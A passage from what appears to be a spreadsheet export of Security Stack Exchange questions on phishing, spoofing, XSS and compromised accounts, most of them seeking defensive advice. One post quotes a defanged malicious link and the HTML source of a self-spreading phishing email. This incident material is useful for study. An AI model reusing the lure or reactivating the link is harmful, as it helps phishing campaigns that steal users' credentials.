 Received: from a27-163.smtp-out.us-west-2.amazonses.com (HELO a27-163.smtp-out.us-west-2.amazonses.com) (54.240.27.163)
  by adam6.eoni.com with (AES128-SHA encrypted) SMTP
  (9d6af486-96d0-11e6-bacc-001e67492cec); Thu, 20 Oct 2016 07:22:22 -0700
 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/simple;
  s=iapqtturmhylirl6i5t3a2ps2ewsadsl; d=business.amazon.com;
  t=1476973341;
  h=Message-ID:Date:Subject:From:To:MIME-Version:Content-Type:List-Unsubscribe;
  bh=CqDwwona4ZmOCsT+zgi3DKmE5lkxklMdpT65fdXrB1c=;
  b=UAkSuvsci14jfOFm+fW8S5l3ntdIbESTZB8eHvo6+itz4xiYy9sxXQ1RoXIJIGq9
  3ny5HJIKyI6wkjKRWnX6TQ3EHhDqDFlkB75Z1NzHNlp/5NUA8cEa6ua+wq1sWdyG33o
  k5gn5Kkz3v72uQMAhT6Dqq/3DSW9ipDMzrHF12Fs=
 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/simple;
  s=gdwg2y3kokkkj5a55z2ilkup5wp5hhxx; d=amazonses.com; t=1476973341;
  h=Message-ID:Date:Subject:From:To:MIME-Version:Content-Type:List-Unsubscribe:Feedback-ID;
  bh=CqDwwona4ZmOCsT+zgi3DKmE5lkxklMdpT65fdXrB1c=;
  b=BdhqUbp6t3dhXe83M3isFcjV2hXaT6rAhCxPN/WXWepJngjhi1EO3Sgd5SbkaEjj
  6dzzlfljD+nKTJH2r9Kd1COeXqc5tgSeMEmVYV1TpmIRhc1fU9RUULRKG4ojxs0msSb
  RDRzSCa83Se484s7KDNwb5LWixFn7jo3oL7DFKx0=
 Message-ID: &amp;lt;01010157e278aa63-283a615a-b603-4300-8c6f-8426b3978f81-000000@us-west-2.amazonses.com&amp;gt;
 Date: Thu, 20 Oct 2016 14:22:21 +0000
 Subject: Free Upgrade to Amazon Business Account
 From: Amazon &amp;lt;no-reply@business.amazon.com&amp;gt;
 To: {A in Q&amp;amp;A}@eoni.com
 MIME-Version: 1.0
 Content-Type: multipart/alternative;
  boundary="_=_swift_v4_1476973341_6e5cebc34b840a2a68132f6e212fdc76_=_"
 X-Pardot-Route: 113:54552:359489270
 List-Unsubscribe: &amp;lt;http://www.amazonbusiness.com/unsubscribe/u/54552/6674f6c0dd8377b4a26688a664718cffd707396fd788791d186acab4a81bd210/359489270&amp;gt;
 X-Report-Abuse-To: abuse@pd25.com
 X-SES-Outgoing: 2016.10.20-54.240.27.163
 Feedback-ID: 1.us-west-2.DslCQSzKRwSQ0bYxCfi+GcY39H31l7QrR+kFUIOTrc4=:AmazonSES
 X-MagicMail-OS: Inactive
 X-MagicMail-UUID: 9d6af486-96d0-11e6-bacc-001e67492cec
 X-MagicMail-SourceIP: 54.240.27.163
 X-MagicMail-RegexMatch: 0
 X-MagicMail-EnvelopeFrom: &amp;lt;01010157e278aa63-283a615a-b603-4300-8c6f-8426b3978f81-000000@us-west-2.amazonses.com&amp;gt;
 X-MagicMail-Original-Destination: {A in Q&amp;amp;A}@eoni.com
 X-MagicMail-Quarantine: Yes
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Looking at the headers, I see it is from what I believe is an AWS email service. (Anyone can buy that and send email). So that doesn't convince me it's Amazon. I see stuff about about Pardot, a salesforce B2B Marketing automation system. That seems odd that it wouldn't be in house to Amazon, but they could use a system like that. So not sure what to think on that.&lt;/p&gt;
 &lt;p&gt;If this is an attack, it has to work somehow. Where do the links go?&lt;/p&gt;
 &lt;p&gt;Create my account: http:/www.amazonbusiness.com/e/54552/gistration-start-ref-b2b-e459b/jt2hvr/359489270&lt;/p&gt;
 &lt;p&gt;Unsubscribe: http:/www.amazonbusiness.com/preferences/?ehash=6674f6c0dd8377b4a26688a664718cffd707396fd788791d186acab4a81bd210&amp;amp;email_id=359489270&lt;/p&gt;
 &lt;p&gt;Update email preferences: http:/www.amazonbusiness.com/preferences/?ehash=6674f6c0dd8377b4a26688a664718cffd707396fd788791d186acab4a81bd210&amp;amp;email_id=359489270&lt;/p&gt;
 &lt;p&gt;None of these have SSL, but the Create my account one redirects to:&lt;/p&gt;
 &lt;p&gt;https:/www.amazon.com/ap/signin?openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fbb%2Fregistration%2Fconfirmation%2Fref%3Db2b_reg_st_rd&amp;amp;openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;amp;openid.assoc_handle=usflex&amp;amp;openid.mode=checkid_setup&amp;amp;marketPlaceId=ATVPDKIKX0DER&amp;amp;openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;amp;pageId=authportal_b2b_login&amp;amp;openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&amp;amp;openid.pape.max_auth_age=0&amp;amp;siteState=pageFlowType%3DLOGIN%2CclientContext%3D168-4326428-9305323%2CsourceUrl%3Dhttps%253A%252F%252Fwww.amazon.com%252Fbb%252Fregistration%252Fconfirmation%252Fref%253Db2b_reg_st_rd%2Csignature%3DLXjj2FO0jmvxdiEVn0vZfa3j2BZbIE4j3D&amp;amp;ref_=null&lt;/p&gt;
 &lt;p&gt;Ok, where is this amazonbusiness.com domain hosted? Who owns the name? Surely Amazon would host all of their sites on AWS, right?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;dig a www.amazonbusiness.com
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.10.3-P4-Ubuntu &amp;lt;&amp;lt;&amp;gt;&amp;gt; a www.amazonbusiness.com
 ;; global options: +cmd
 ;; Got answer:
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 58074
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0
 ;; QUESTION SECTION:
 ;www.amazonbusiness.com. IN A
 ;; ANSWER SECTION:
 www.amazonbusiness.com. 820 IN CNAME go.pardot.com.
 go.pardot.com. 7199 IN CNAME pi.pardot.com.
 pi.pardot.com. 29 IN CNAME pi-dfw.pardot.com.
 pi-dfw.pardot.com. 29 IN CNAME pi-dfw-lb1.pardot.com.
 pi-dfw-lb1.pardot.com. 899 IN A 136.147.104.32
 ;; Query time: 57 msec
 ;; SERVER: 192.168.88.1#53(192.168.88.1)
 ;; WHEN: Thu Oct 20 08:21:50 PDT 2016
 ;; MSG SIZE rcvd: 143
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Compare that to amazon.com itself:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;dig a amazon.com
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.10.3-P4-Ubuntu &amp;lt;&amp;lt;&amp;gt;&amp;gt; a amazon.com
 ;; global options: +cmd
 ;; Got answer:
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 40326
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
 ;; QUESTION SECTION:
 ;amazon.com. IN A
 ;; ANSWER SECTION:
 amazon.com. 23 IN A 54.239.25.208
 amazon.com. 23 IN A 54.239.17.7
 amazon.com. 23 IN A 54.239.26.128
 amazon.com. 23 IN A 54.239.25.192
 amazon.com. 23 IN A 54.239.17.6
 amazon.com. 23 IN A 54.239.25.200
 ;; Query time: 1 msec
 ;; SERVER: 192.168.88.1#53(192.168.88.1)
 ;; WHEN: Thu Oct 20 09:02:34 PDT 2016
 ;; MSG SIZE rcvd: 124
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Ok, so who owns the IP address space for the possibly fake site:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;whois 136.147.104.32
 #
 # ARIN WHOIS data and services are subject to the Terms of Use
 # available at: https://www.arin.net/whois_tou.html
 #
 # If you see inaccuracies in the results, please report at
 # https://www.arin.net/public/whoisinaccuracy/index.xhtml
 #
 #
 # The following results may also be obtained via:
 # https://whois.arin.net/rest/nets;q=136.147.104.32?showDetails=true&amp;amp;showARIN=false&amp;amp;showNonArinTopLevelNet=false&amp;amp;ext=netref2
 #
 NetRange: 136.147.0.0 - 136.147.255.255
 CIDR: 136.147.0.0/16
 NetName: SFDC-3
 NetHandle: NET-136-147-0-0-1
 Parent: NET136 (NET-136-0-0-0-0)
 NetType: Direct Allocation
 OriginAS: AS14340
 Organization: Salesforce.com, Inc. (SALESF-3)
 RegDate: 2012-02-24
 Updated: 2014-07-14
 Ref: https://whois.arin.net/rest/net/NET-136-147-0-0-1
 OrgName: Salesforce.com, Inc.
 OrgId: SALESF-3
 Address: 1 Market Street
 Address: Suite 300
 City: San Francisco
 StateProv: CA
 PostalCode: 94105
 Country: US
 RegDate: 1999-11-30
 Updated: 2014-11-20
 Ref: https://whois.arin.net/rest/org/SALESF-3
 OrgAbuseHandle: NOC1403-ARIN
 OrgAbuseName: Network Operations Center
 OrgAbusePhone: +1-415-901-7000 
 OrgAbuseEmail: arin@salesforce.com
 OrgAbuseRef: https://whois.arin.net/rest/poc/NOC1403-ARIN
 OrgNOCHandle: NOC1403-ARIN
 OrgNOCName: Network Operations Center
 OrgNOCPhone: +1-415-901-7000 
 OrgNOCEmail: arin@salesforce.com
 OrgNOCRef: https://whois.arin.net/rest/poc/NOC1403-ARIN
 OrgAbuseHandle: SAN76-ARIN
 OrgAbuseName: Salesforce Abuse NOC
 OrgAbusePhone: +1-703-463-3219 
 OrgAbuseEmail: abuse@salesforce.com
 OrgAbuseRef: https://whois.arin.net/rest/poc/SAN76-ARIN
 OrgTechHandle: NOC1403-ARIN
 OrgTechName: Network Operations Center
 OrgTechPhone: +1-415-901-7000 
 OrgTechEmail: arin@salesforce.com
 OrgTechRef: https://whois.arin.net/rest/poc/NOC1403-ARIN
 RNOCHandle: NOC1403-ARIN
 RNOCName: Network Operations Center
 RNOCPhone: +1-415-901-7000 
 RNOCEmail: arin@salesforce.com
 RNOCRef: https://whois.arin.net/rest/poc/NOC1403-ARIN
 RAbuseHandle: SAN76-ARIN
 RAbuseName: Salesforce Abuse NOC
 RAbusePhone: +1-703-463-3219 
 RAbuseEmail: abuse@salesforce.com
 RAbuseRef: https://whois.arin.net/rest/poc/SAN76-ARIN
 RTechHandle: NOC1403-ARIN
 RTechName: Network Operations Center
 RTechPhone: +1-415-901-7000 
 RTechEmail: arin@salesforce.com
 RTechRef: https://whois.arin.net/rest/poc/NOC1403-ARIN
 #
 # ARIN WHOIS data and services are subject to the Terms of Use
 # available at: https://www.arin.net/whois_tou.html
 #
 # If you see inaccuracies in the results, please report at
 # https://www.arin.net/public/whoisinaccuracy/index.xhtml
 #
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;So NOT on AWS. Compare to who owns the IP address space hosting Amazon.com:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;whois 54.239.26.128
 #
 # ARIN WHOIS data and services are subject to the Terms of Use
 # available at: https://www.arin.net/whois_tou.html
 #
 # If you see inaccuracies in the results, please report at
 # https://www.arin.net/public/whoisinaccuracy/index.xhtml
 #
 #
 # The following results may also be obtained via:
 # https://whois.arin.net/rest/nets;q=54.239.26.128?showDetails=true&amp;amp;showARIN=false&amp;amp;showNonArinTopLevelNet=false&amp;amp;ext=netref2
 #
 NetRange: 54.224.0.0 - 54.239.255.255
 CIDR: 54.224.0.0/12
 NetName: AMAZON-2011L
 NetHandle: NET-54-224-0-0-1
 Parent: NET54 (NET-54-0-0-0-0)
 NetType: Direct Allocation
 OriginAS: AS16509
 Organization: Amazon Technologies Inc. (AT-88-Z)
 RegDate: 2012-03-01
 Updated: 2012-04-02
 Ref: https://whois.arin.net/rest/net/NET-54-224-0-0-1
 OrgName: Amazon Technologies Inc.
 OrgId: AT-88-Z
 Address: 410 Terry Ave N.
 City: Seattle
 StateProv: WA
 PostalCode: 98109
 Country: US
 RegDate: 2011-12-08
 Updated: 2014-10-20
 Comment: All abuse reports MUST include:
 Comment: * src IP
 Comment: * dest IP (your IP)
 Comment: * dest port
 Comment: * Accurate date/timestamp and timezone of activity
 Comment: * Intensity/frequency (short log extracts)
 Comment: * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.
 Ref: https://whois.arin.net/rest/org/AT-88-Z
 OrgTechHandle: ANO24-ARIN
 OrgTechName: Amazon EC2 Network Operations
 OrgTechPhone: +1-206-266-4064 
 OrgTechEmail: amzn-noc-contact@amazon.com
 OrgTechRef: https://whois.arin.net/rest/poc/ANO24-ARIN
 OrgAbuseHandle: AEA8-ARIN
 OrgAbuseName: Amazon EC2 Abuse
 OrgAbusePhone: +1-206-266-4064 
 OrgAbuseEmail: abuse@amazonaws.com
 OrgAbuseRef: https://whois.arin.net/rest/poc/AEA8-ARIN
 OrgNOCHandle: AANO1-ARIN
 OrgNOCName: Amazon AWS Network Operations
 OrgNOCPhone: +1-206-266-4064 
 OrgNOCEmail: amzn-noc-contact@amazon.com
 OrgNOCRef: https://whois.arin.net/rest/poc/AANO1-ARIN
 #
 # ARIN WHOIS data and services are subject to the Terms of Use
 # available at: https://www.arin.net/whois_tou.html
 #
 # If you see inaccuracies in the results, please report at
 # https://www.arin.net/public/whoisinaccuracy/index.xhtml
 #
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;So Amazon.com is on AWS, just like I thought it would be.&lt;/p&gt;
 &lt;p&gt;At this point, I'm not sure whether the email is fake or not. Is it? If so, how does it work? It seems to be doing something with OpenID, what's going on there? How could I know for sure in the future?&lt;/p&gt;</t>
  </si>
  <si>
    <t>How can a phishing page know my account information?</t>
  </si>
  <si>
    <t>&lt;p&gt;I clicked on a phishing website. I was surprised to find that this website looked exactly like google and had my information displayed. The information displayed were my email and my profile picture. I quickly left the website without knowing what to do. Can someone access my google account even if I changed the password?&lt;/p&gt;
 &lt;p&gt;I use the same password for a lot of websites. (more than 150)&lt;/p&gt;
 &lt;p&gt;Do I have to change that password for all the websites?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Difference between DNS spoofing and phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I am writing a bachelor thesis and I am having a hard time figuring out the difference between phishing and DNS spoofing. From what I understand, DNS spoofing is a way to achieve a succesfull phishing of somebody's user name and passwords (or other credentials).&lt;/p&gt;
 &lt;p&gt;Do I understand it correctly ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;dns&gt;&lt;phishing&gt;&lt;spoofing&gt;</t>
  </si>
  <si>
    <t>What can we do with non persistent XSS vulnerabilities?</t>
  </si>
  <si>
    <t>&lt;p&gt;Sorry for this stupid question but i'm thinking about what an attacker can do with a non persistent XSS attack on a website?&lt;/p&gt;
 &lt;p&gt;An attacker can try to phish me with a malicious url, steal my cookies or my history etc... but does he also need my intervention or a human interaction for his attack?&lt;/p&gt;
 &lt;p&gt;What else he can do with non persistent XSS?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;xss&gt;</t>
  </si>
  <si>
    <t>How Browsers prevents Malware and Phishing attacks</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to know how phishing and malware protection features are implemented in modern browsers like Chrome, Firefox, IE etc. Are these features heuristic based, or do browsers maintain a list of blacklisted websites like in case of &lt;a href="http://www.mozilla.org/en-US/firefox/phishing-protection/" rel="nofollow"&gt;mozilla&lt;/a&gt; . Secondly, is there any security standard or specification the browser must be compliant with?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;malware&gt;&lt;phishing&gt;&lt;chrome&gt;&lt;firefox&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;phishing&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>How to determine if a webshop is scam?</t>
  </si>
  <si>
    <t>&lt;p&gt;Nowadays people prefer to do their shopping online rather than using the real shop, especially because of the COVID-19 restrictions. But in the same context, attackers (scammers) are trying to gain their own interest from this situation. I'm in the middle of one research where we have found hundreds of scam webshops, but still I'm willing to learn more every day.&lt;/p&gt;
 &lt;p&gt;So question for anyone who needs or want to shop online these days is: &lt;strong&gt;How to determine, spot scam webshop?&lt;/strong&gt; What are the main &lt;em&gt;indicators&lt;/em&gt; pointing to the fact, that it is &lt;strong&gt;not safe&lt;/strong&gt; to shop there?&lt;/p&gt;
 &lt;p&gt;What can a regular user do or check on a website, to be sure that it's safe to do shopping?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;credit-card&gt;&lt;web&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Client-side attacks with custom malware in penetration tests</t>
  </si>
  <si>
    <t>&lt;p&gt;I regularly perform pen-tests against web applications, operating systems, etc. Occasionally, I'm luck enough to do a 'red-teaming' exercise and get to attack at all conceivable points of a network (people etc as well) which is good fun and usually goes quite smoothly.&lt;/p&gt;
 &lt;p&gt;However, a client recently mentioned that they'd be interested in testing client-side (end-user) machines such as desktops/laptops as well, in order to see what type of attacks could be conducted against them, as a means of testing endpoint security (firewall/HIPS/AV/app whitelisting), and also to put their incident response program under stress. &lt;/p&gt;
 &lt;p&gt;They're looking at using custom malware to do this and are willing to let us try and propagate our own code in their environment. &lt;/p&gt;
 &lt;p&gt;Since most successful attacks these days involve client-side attacks (spear phishing, drive-by downloads, etc.) it makes sense to test the actual endpoints (which are usually a big problem). However, I'm worried that if we create a self-spreading piece of malware it will eventually get loose from the network, or that in one of the infinite possible application interactions, it will knock some server offline. Obviously the client will sign a waiver and shoulder risks like this.&lt;/p&gt;
 &lt;p&gt;Are client-side attack scenarios common requests? What other people do in these types of scenarios? Are there any methodologies to follow regarding the use of custom malware in client-side pentests?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;client-side&gt;</t>
  </si>
  <si>
    <t>Gmail (Dot) Phishing Attack From Avalanche Botnet</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm a full-stack web developer working in a small startup and have been wearing many hats as a result. I am by no means a cyber or information security expert. I'm looking for a general evaluation of severity and potential steps I can take as we seem to have been probed by a phishing botnet which is more advanced than what I am used to.&lt;/p&gt;
 &lt;p&gt;My application is a small MVP, LAMP stack and deployed on AWS a few weeks ago. It hasn't been promoted or publicized in any way. Nevertheless, I seemed to be getting scraped by various bots, and this wasn't a concern for me because in my experience this is a common occurrence once you network your deployment on a popular service like AWS.&lt;/p&gt;
 &lt;p&gt;Then, I noticed something more unusual in my experience, which is some spammy logins and account creation. Still, nothing too concerning because at the application level we have appropriate roles for new users and I was pretty confident this was just going to be an annoyance.&lt;/p&gt;
 &lt;p&gt;Finally, I started noticing similar emails popup in the list I identified as spam. Pretty soon I noticed a pattern - they were all &lt;code&gt;@gmail&lt;/code&gt; and all the same accounts - except they had "&lt;code&gt;.&lt;/code&gt;" (periods) in randomly different places. Now I know this means, according to Gmail, &lt;em&gt;that it goes to the same email address&lt;/em&gt;. &lt;/p&gt;
 &lt;p&gt;But then I got concerned that it was going to be a phishing attack because someone could take my email and append a dot in the middle and send emails my way from their account. I thought also if they established an XSS attack they could use this to direct me more easily to the page, and I'm sure there are other things they could do.&lt;/p&gt;
 &lt;p&gt;A couple notes about these accounts: they weren't the kinds of bots (if it was a bot) I am used to. The different variations of the same address were small in volume, only three and spread out over several days. When I traced the IP it came back as being on a blacklist associated with the Avalanche botnet. At this point I was a bit intimidated but I couldn't find any information specifically on Avalanche and this gmail quirk. I also read that Avalanche had largely been taken down by the authorities, so was a bit concerned about this as well.&lt;/p&gt;
 &lt;p&gt;To pin down my question:&lt;/p&gt;
 &lt;p&gt;1). Given the nature of the account creation - was it a human being doing this or likely a bot? Was I targeted specifically or is this bot just hitting all AWS IPs, for example? Is the avalanche bot advanced to space out the account creation so it doesn't look like the more obvious bots and spam attacks?&lt;/p&gt;
 &lt;p&gt;2). I feel like another shoe has to drop here - obviously I can quickly create some application logic to get rid of treating gmails and other emails with dots as separate accounts - but that in of itself seems like their setup, not their final play. Should I be worried about other exploits on my system? I have setup proper security groups, SSH keys, SSL and have separate servers for my different services.&lt;/p&gt;
 &lt;p&gt;3). How worried should I be? Is this just part of life on the internet? I just have never seen this bot before and am worried this is only part 1 of a targeted attack - again we have only about 20 users in the database - most of whom are internal company accounts. So I'm worried that we are already dealing with this kind of attack at our small scale.&lt;/p&gt;
 &lt;p&gt;4). What can I do to mitigate this kind of phishing attack beyond sanitizing the dots things? Are there some canonical resources for these kinds of exploits? I didn't think about the dots until after I noticed the similarities in the three emails.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; I should mention I am still going through the logs and trying to find what else this IP/user/bot was doing besides creating these accounts... but my guess is I won't find much and it is a lot to go through because of how my AWS is spacing out the logs and the fact that we were testing a load balancer for a while.&lt;/p&gt;
 &lt;p&gt;Thank you so much :)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;account-security&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>How could I get a spam/phishing email from microsoft.com</t>
  </si>
  <si>
    <t>&lt;p&gt;I got this email from &lt;code&gt;no-reply@microsoft.com&lt;/code&gt;. This spam email &lt;code&gt;Report The User&lt;/code&gt; points to &lt;code&gt;mailto:Unusuaal.Signin980@googlemail.com?subject=unusual sign-in activity&amp;amp;body=Report The User&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;How can someone send spam/phishing email from &lt;code&gt;microsoft.com&lt;/code&gt; domain?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Is this Google mail from gaia.bounces.google.com legit?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've received the following suspicious mail in my Gmail inbox, about my password being exposed:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/KobrS.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/KobrS.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;As you can see, it comes from &lt;em&gt;gaia.bounces.google.com&lt;/em&gt; and is signed by &lt;em&gt;accounts.google.com&lt;/em&gt;. But there are two weird things about it:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;It is written in Portuguese. I live in Spain (but near the border with Portugal, just in case that's relevant) and usually receive Google mail in spanish.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The mentioned account is a @hotmail one I use as backup account, not the main Gmail one. It's been listed on &lt;em&gt;haveibeenpwned.com&lt;/em&gt; time ago but I changed all my passwords a few months ago when I started using a password manager.&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I cannot see any problem with the signature, and the links on the mail seem legit. I've checked the certificate on the linked website and read &lt;a href="https://support.google.com/mail/answer/180707" rel="nofollow noreferrer"&gt;this&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;Is this legit? Does Google warn about other non-Google accounts?&lt;/p&gt;</t>
  </si>
  <si>
    <t>How could we provide certainty to users that education material on phishing, isn't phishing itself?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is a problem that has been bothering me somewhat. &lt;/p&gt;
 &lt;p&gt;I am able to run a phishing simulation campaign against users across the organisation. If the user clicks on a bad link they are directed and told that they have made a mistake and that they should not have clicked. They are then offered some guidance on what the correct actions should have been through a webpage.&lt;/p&gt;
 &lt;p&gt;This all sounds great, but how can assurance be given to users it isn't a sophisticated phishing attack?&lt;/p&gt;
 &lt;p&gt;I have thought about using existing phishing material internally used, and have the link point to the intranet - is there a better way?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Don't understand how my mum's Gmail account was hacked</t>
  </si>
  <si>
    <t>&lt;p&gt;My mum (on Gmail, using Chrome) received an email from a friend's Hotmail address. She opened the email (very obviously a phishing email) and clicked a link in it. This opened a webpage with loads of medical ads on. She closed the page and deleted the email.&lt;/p&gt;
 &lt;p&gt;She did not notice anything else happen when she clicked the link. For example, she did not see a download start and did not click anything on the page that opened.&lt;/p&gt;
 &lt;p&gt;The URI of the link she clicked was &lt;code&gt;hxxp://23.88.82.34/d/?sururopo=duti&amp;amp;bugenugamaxo=aGViZTFzaGViZUBob3RtYWlsLmNvLnVr&amp;amp;id=anVuYWx4QGdvb2dsZW1haWwuY29t&amp;amp;dokofeyo=anVuYWx4&lt;/code&gt; [DON'T visit that address!]&lt;/p&gt;
 &lt;p&gt;Immediately (although she didn't know at the time) about 75 emails were sent from her Gmail address to a selection of her contacts. They are visible in the Sent Mail list in her Gmail account. This happened between 17:08 and 17:10 GMT. Here the source of one:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;lalala@googlemail.com&amp;gt;
 Received: from localhost (host86-152-149-189.range86-152.btcentralplus.com. [86.152.149.189])
  by mx.google.com with ESMTPSA id r1sm16019263wia.5.2014.02.23.09.10.15
  for &amp;lt;lalala@hotmail.com&amp;gt;
  (version=TLSv1 cipher=ECDHE-RSA-RC4-SHA bits=128/128);
  Sun, 23 Feb 2014 09:10:16 -0800 (PST)
 Message-ID: &amp;lt;530a2b78.8108b40a.6eac.5c3d@mx.google.com&amp;gt;
 Date: Sun, 23 Feb 2014 09:10:16 -0800 (PST)
 MIME-Version: 1.0
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 From: lalala@googlemail.com
 Return-Path: lalala@googlemail.com
 Subject: Bar gain
 &amp;lt;span style=3D&amp;quot;VISIBILITY:hidden;display:none&amp;quot;&amp;gt;Mount your brooms said Madam=
  Hooch Three two one =20
 &amp;lt;/span&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;u&amp;gt;lalala@googlemail.com has sent you 3 offline broadcast&amp;lt;/u&amp;gt;&amp;lt;=
 br /&amp;gt;&amp;lt;a href=3D&amp;quot;hxxp://23.88.82.8/d/?ba=3Djurofaxovu&amp;amp;maremiditigehavuve=3Da=
 nVuYWx4QGdvb2dsZW1haWwuY29t&amp;amp;id=3DaGVsZW5fY19odWdoZXNAaG90bWFpbC5jb20=3D&amp;amp;guv=
 iwafaloco=3DaGVsZW5fY19odWdoZXM=3D&amp;quot; &amp;gt;Locate Full Email Content&amp;lt;/a&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Here's the Gmail &amp;quot;Activity information&amp;quot; window:
 &lt;img src="https://i.stack.imgur.com/mRQ2f.png" alt="enter image description here" /&gt;&lt;/p&gt;
 &lt;p&gt;Note that the IP address in that list, 86.152.149.189, is the same as in the header of that email.&lt;/p&gt;
 &lt;p&gt;One of my mum's friends reports that she received one of the emails and clicked on the link in it. She says that her email account then sent out a load of emails too.&lt;/p&gt;
 &lt;p&gt;I don't know what my mum's IP address was at the time this happened. So maybe it was 86.152.149.189.&lt;/p&gt;
 &lt;p&gt;I don't understand how this happened. She had an impressively strong password (which I've now changed) that she doesn't use for anything else and she didn't type this password into the page that opened.&lt;/p&gt;
 &lt;p&gt;How on earth could clicking a link in an email allow an attacker authenticate themselves with the Gmail SMTP server as my mum and then to send a load of emails as her to her contacts? And how could it have got the addresses of her contacts?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Update subsequent to Iserni's answer&lt;/strong&gt;:&lt;/p&gt;
 &lt;p&gt;My mum confirms that she did indeed enter her Gmail password when &amp;quot;Gmail&amp;quot; asked for it after the page of medical ads closed. Her aunt received one of the emails and was also asked to enter her Gmail login details. She says she did because the original email came from my mum. Clever attack&lt;/p&gt;</t>
  </si>
  <si>
    <t>Can a telephone caller be authenticated?</t>
  </si>
  <si>
    <t>&lt;p&gt;If we assume that the human element is unable or not skilled enough to discover a phishing attempt (or some other malicious endeavor that can be perpetrated verbally), what forms of defense can be deployed to aid in the authentication of a telephone call?&lt;/p&gt;
 &lt;p&gt;Specific example - if a telephone call is coming from a spoofed number:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Can it be detected? &lt;/li&gt;
 &lt;li&gt;Can it be prevented? &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Primarily interested in the userland (or the equivalent enterprise) context, meaning "below" the provider. Although any musings or explanations that involves or references the provider would certainly be interesting, even if not directly useful.&lt;/p&gt;
 &lt;p&gt;Media where I live enjoys claiming you can't "defend" against these types of attacks/spoofs using strictly technical means -- are they right?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phone&gt;&lt;spoofing&gt;</t>
  </si>
  <si>
    <t>SMS based 2FA intercepts</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://techcrunch.com/2018/08/01/reddit-breach-exposes-user-data-but-not-much/amp/" rel="nofollow noreferrer"&gt;Reddit&lt;/a&gt; just revealed that they experienced a security breach as a result of an intercepted SMS based 2FA. Another post &lt;a href="https://security.stackexchange.com/q/158770/117477"&gt;on SMS 2FA&lt;/a&gt; refers to flaw in the telecom‚Äôs ss7 protocol that was used to perform the breach. &lt;/p&gt;
 &lt;p&gt;I‚Äôm not sure if the Reddit incident involved the ss7 technique or some sort of spear phishing to get some malicious code installed on the device that received the SMS. However if an intercept was used I would have expected the original device to have received the message and the owner realizing they didn‚Äôt request it and alert their company‚Äôs security team. That being said, would the hackers have been able to block the legitimate device from getting their request for an SMS 2FA or would they have had to wait for the target to request one and just try to beat them to the login?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;multi-factor&gt;&lt;sms&gt;&lt;ss7&gt;</t>
  </si>
  <si>
    <t>How often does a user type in the "last 4 digits of SSN" in the "last 4 digits of Phone"?</t>
  </si>
  <si>
